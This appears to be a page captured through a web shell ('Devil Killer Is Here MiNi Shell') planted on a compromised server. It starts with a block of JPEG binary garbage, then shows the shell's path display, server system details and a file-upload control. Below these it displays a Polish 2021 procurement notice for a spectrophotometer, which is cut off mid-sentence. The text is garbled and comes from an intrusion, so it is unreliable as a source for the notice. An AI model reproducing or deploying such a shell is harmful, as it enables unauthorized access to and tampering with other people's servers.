JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210527/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210527/0006681201-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00066812 z dnia 2021-05-27</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa Spektrofotometru UV-VIS-NIR </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Główny Urząd Miar</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Wydział Zamówień Publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 010415420</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Elektoralna 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-139</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gum@gum.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gum.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa Spektrofotometru UV-VIS-NIR </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a607c10a-bec6-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00066812</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00009020/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Zakup Spektrofotometru UV-VIS-NIR</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia-gum.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia-gum.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia i w konkursie, w tym składanie <br/>ofert, wniosków o dopuszczenie do udziału w postępowaniu lub konkursie, wymiana <br/>informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym <br/>a Wykonawcą, z uwzględnieniem wyjątków określonych w p.z.p., odbywa się przy użyciu <br/>środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się <br/>środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o <br/>świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344). <br/>2. Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 p.z.p., podmiotowe środki <br/>dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby <br/>sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, <br/>w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt. Ofertę, a także oświadczenie,<br/>o jakim mowa w Rozdziale X ust. 1 SWZ składa się, pod rygorem nieważności, w formie <br/>elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem <br/>osobistym.<br/>3. Komunikacja, o której mowa w ust. 1, w tym zawiadomienia, oświadczenia, wnioski lub <br/>informacje przekazywane są poprzez Platformę, dostępną pod adresem: <br/>https://zamowienia-gum.ezamawiajacy.pl”<br/>4. Komunikacja między Zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, <br/>wnioski, zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za <br/>pośrednictwem Platformy w zakładce „Pytania/Informacje”. Za datę wpływu oświadczeń, <br/>wniosków, zawiadomień oraz informacji przyjmuje się datę ich wczytania na Platformę. <br/>5. Szczegółowa Instrukcja dla Wykonawców dot. obsługi Platformy E-Zamawiający <br/>znajduje się pod powyższym adresem w zakładce „Regulacje i procedury procesu zakupowego”. Wykonawca zainteresowany przystąpieniem do postępowania powinien <br/>zapoznać się z aktualnie obowiązującymi Regulacjami.<br/>6. Rejestracja i korzystanie z Platformy jest bezpłatne.<br/>7. Zgodnie z 67 p.z.p., Zamawiający podaje wymagania techniczne związane z korzystaniem <br/>z Platformy:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 <br/>kb/s; <br/>2) komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, <br/>procesor Intel IV 2GHZ, jeden z systemów operacyjnych – MS Windows 7, Mac Os X <br/>10.4, Linux, lub ich nowsze wersje; <br/>3) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer <br/>minimalnie wersja 10.0; <br/>4) włączona obsługa JavaScript; <br/>5) zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf. <br/>8. Osobą uprawnioną do porozumiewania się z Wykonawcami w zakresie proceduralnym <br/>jest: Renata Raczyńska, tel. 22-581-90-70.<br/>9. W korespondencji kierowanej do Zamawiającego Wykonawcy powinni posługiwać się <br/>numerem przedmiotowego postępowania.<br/>10. Wykonawca może zwrócić się do zamawiającego z wnioskiem o wyjaśnienie treści SWZ.<br/>11. Zamawiający jest obowiązany udzielić wyjaśnień niezwłocznie, jednak nie później niż na <br/>2 dni przed upływem terminu składania odpowiednio ofert, pod warunkiem, że wniosek<br/>o wyjaśnienie treści SWZ wpłynął do zamawiającego nie później niż na 4 dni przed <br/>upływem terminu składania odpowiednio ofert. <br/>12. Jeżeli Zamawiający nie udzieli wyjaśnień w terminie, o którym mowa w ust. 11, przedłuża <br/>termin składania ofert o czas niezbędny do zapoznania się wszystkich zainteresowanych <br/>Wykonawców z wyjaśnieniami niezbędnymi do należytego przygotowania i złożenia <br/>ofert. W przypadku gdy wniosek o wyjaśnienie treści SWZ nie wpłynął w terminie, o <br/>którym mowa w ust. 11, Zamawiający nie ma obowiązku udzielania wyjaśnień SWZ oraz <br/>obowiązku przedłużenia terminu składania ofert.<br/>13. Przedłużenie terminu składania ofert, o których mowa w ust. 12, nie wpływa na bieg <br/>terminu składania wniosku o wyjaśnienie treści SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) <br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku <br/>z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych <br/>oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 <br/>z dnia 4 maja 2016 r., str. 1; zwanym dalej "RODO") informujemy, że:<br/>1) administratorem danych osobowych jest Główny Urząd Miar;<br/>2) administrator wyznaczył Inspektora Danych Osobowych, z którym można się <br/>kontaktować pod adresem e-mail: iod@gum.gov.pl;<br/>3) udostępnione dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c <br/>RODO w celu związanym z przedmiotowym postępowaniem o udzielenie <br/>zamówienia publicznego, prowadzonym w trybie postępowania ustawowego;<br/>4) odbiorcami udostępnionych danych osobowych będą osoby lub podmioty, którym <br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy <br/>p.z.p.;<br/>5) przekazane dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 p.z.p. przez <br/>okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas <br/>trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania <br/>umowy;<br/>6) obowiązek podania danych osobowych dotyczący osób fizycznych zaangażowanych <br/>w realizacje zamówienia jest wymogiem ustawowym określonym w przepisanych <br/>p.z.p. i związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>7) w odniesieniu do przekazanych danych osobowych decyzje nie będą podejmowane <br/>w sposób zautomatyzowany, stosownie do art. 22 RODO;<br/>8) osoby, których dane osobowe zostaną przekazane Zamawiającemu posiadają:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących <br/>tych osób (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie <br/>administratora niewspółmiernie dużego wysiłku osoby fizyczne, której dane <br/>dotyczą, zobowiązane będą do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty <br/>postępowania o udzielenie zamówienia publicznego lub konkursu albo <br/>sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie <br/>zamówienia),<br/>b) na podstawie art. 16 RODO prawo do sprostowania danych osobowych <br/>(skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku <br/>postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy <br/>w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu <br/>oraz jego załączników),<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia <br/>przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania <br/>o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których <br/>mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma <br/>zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze <br/>środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, <br/>lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa <br/>członkowskiego),<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, <br/>gdy uznają, że przetwarzanie danych osobowych ich dotyczących narusza <br/>przepisy RODO;<br/>9) osobom, których dane osobowe zostaną przekazane Zamawiającemu nie <br/>przysługuje:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych <br/>osobowych,<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych <br/>osobowych, gdyż podstawą prawną przetwarzania danych osobowych tych osób <br/>jest art. 6 ust. 1 lit. c RODO;<br/>10) osobom, których dane osobowe zostaną przekazane Zamawiającemu przysługuje <br/>prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO <br/>przetwarzanie ich danych osobowych przez administratora. Organem właściwym dla <br/>przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 <br/>Warszawa</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BDG-WZP.261.86.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa spektrofotometru UV-VIS-NIR. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">38636000-2 - Specjalistyczne przyrządy optyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium Cena brutto - znaczenie 60%; <br/>Kryterium Gwarancja – znaczenie 20%;<br/>Kryterium doświadczenie osoby skierowanej do realizacji zamówienia w serwisowaniu Spektrofotometrów UV-VIS-NIR klasy oferowanego modelu urządzenia – znaczenie 20%.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby skierowanej do realizacji zamówienia w serwisowaniu Spektrofotometrów UV-VIS-NIR klasy oferowanego modelu urządzenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o braku podstaw do wykluczenia z postępowania - zgodnie z Załącznikiem nr 2 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku <br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo<br/>winno być załączone do oferty. <br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, <br/>oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z wykonawców. <br/>Oświadczenia te potwierdzają brak podstaw wykluczenia.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty <br/>oświadczenie, z którego wynika, które dostawy wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Kupujący przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Sprzedawcy, <br/>w następujących przypadkach:<br/>1) zmiany wysokości łącznego wynagrodzenia brutto, o którym mowa w § 2 ust. 1 <br/>w sytuacji zmiany stawki podatku od towarów i usług (VAT) w ramach realizacji <br/>Umowy, jeżeli będzie ona miała wpływ na koszty wykonania umowy przez <br/>Sprzedawcę. W takiej sytuacji całkowite wynagrodzenie brutto, o którym mowa w § 2 <br/>ust. 1, może ulec odpowiedniemu zmniejszeniu lub zwiększeniu w zależności od skali <br/>wpływu powyższej zmiany na koszty wykonania umowy;<br/>2) konieczności wydłużenia terminu realizacji z uwagi na wpływ skutków COVID – 19 na <br/>sposób realizacji Umowy. Strony Umowy niezwłocznie, wzajemnie informują się <br/>o wpływie okoliczności związanych z wystąpieniem skutków COVID-19 na należyte <br/>wykonanie tej umowy, o ile taki wpływ wystąpił lub może wystąpić. Strony umowy <br/>potwierdzają ten wpływ dołączając do informacji, o której mowa w zdaniu pierwszym, <br/>oświadczenia lub dokumenty, które mogą dotyczyć w szczególności:<br/>a) nieobecności pracowników lub osób świadczących pracę za wynagrodzeniem <br/>na innej podstawie niż stosunek pracy, które uczestniczą lub mogłyby <br/>uczestniczyć w realizacji Umowy,<br/>b) decyzji wydanych przez Głównego Inspektora Sanitarnego lub działającego <br/>z jego upoważnienia państwowego wojewódzkiego inspektora sanitarnego, <br/>w związku z przeciwdziałaniem COVID-19, nakładających na Sprzedawcę <br/>obowiązek podjęcia określonych czynności zapobiegawczych lub kontrolnych,<br/>c) poleceń wydanych przez wojewodów lub decyzji wydanych przez Prezesa <br/>Rady Ministrów związanych z przeciwdziałaniem COVID-19, o których mowa <br/>w art. 11 ust. 1 i 2 ustawy z dnia 31 marca 2020 r. o zmianie ustawy <br/>o szczególnych rozwiązaniach związanych z zapobieganiem, <br/>przeciwdziałaniem i zwalczaniem COVID-19, innych chorób zakaźnych oraz <br/>wywołanych nimi sytuacji kryzysowych oraz niektórych innych ustaw (Dz. U. <br/>2020 r. poz. 568),<br/>d) wstrzymania dostaw produktów, komponentów produktu lub materiałów, <br/>trudności w dostępie do sprzętu lub trudności w realizacji usług <br/>transportowych,<br/>e) okoliczności, o których mowa w lit. a – d, w zakresie w jakim dotyczą one <br/>podwykonawcy lub dalszego podwykonawcy.<br/>Na podstawie przekazanych informacji druga ze stron potwierdzi lub wniesie <br/>o przedstawienie dodatkowych informacji, które potwierdzą wpływ okoliczności związanych z wystąpieniem skutków COVID – 19 na należyte wykonanie umowy. <br/>Zmiana terminu realizacji Umowy będzie proporcjonalna do okresu trwania skutków <br/>uniemożliwiających jej realizację, a wynagrodzenie Sprzedawcy nie ulegnie zmianie z tego powodu; <br/>Pozostałe podstawy zmiany umowy (z uwagi na ograniczenie formularza ogłoszenia) znajdują się w dokumentacji postępowania (Załącznik nr 3 do SWZ Projekt Umowy). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-08 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zamowienia-gum.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-08 12:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-07</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do 